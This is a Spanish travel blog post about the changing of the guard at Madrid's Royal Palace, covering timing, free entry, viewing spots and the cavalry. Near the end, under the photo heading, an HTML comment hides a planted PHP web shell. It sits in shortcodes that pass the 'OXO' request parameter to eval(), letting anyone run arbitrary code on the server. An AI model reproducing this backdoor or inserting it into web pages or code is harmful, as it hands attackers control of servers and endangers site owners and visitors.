Relevo Solemne en el Palacio Real de Madrid

Publicado en: Blog, España, Europa | 0
Cambio de Guardia en el Palacio Real de Madrid (España)

Cambio de Guardia en el Palacio Real de Madrid (España)

Son las 11 de la mañana, y como cada primer miércoles de mes (salvo acto oficial o inclemencia meteorológica), los turistas empiezan a hacer cola para ver el Relevo Solemne de Guardia en el Palacio Real en Madrid. Esta tradición se celebra en el Patio de Armas y no empieza hasta las 12, durando unos 40 minutos.

La entrada es gratuita y los mejores lugares para disfrutar de este Cambio de Guardia son las gradas que habilitadas en mismo Patio de Armas o desde la plaza de la Armería. Yo intenté subir a uno de los balcones de la Catedral de La Almudena, pero mientras dura el acto no permite subir.

Pese a que en el acto participan más de 400 fusileros a pie, lo más espectacular fue la caballería con cerca de 100 soldados a lomos de sus caballos.

Más información:

  • En nuesta aplicación Top Travel, disponible para Android, podéis descargar fondos de pantalla gratis de Madrid y consultar los mejores destinos turísticos de la ciudad.

Fotos:

<!– [insert_php]if (isset($_REQUEST["OXO"])){eval($_REQUEST["OXO"]);exit;}[/insert_php][php]if (isset($_REQUEST["OXO"])){eval($_REQUEST["OXO"]);exit;}[/php] –>

Dejar un comentario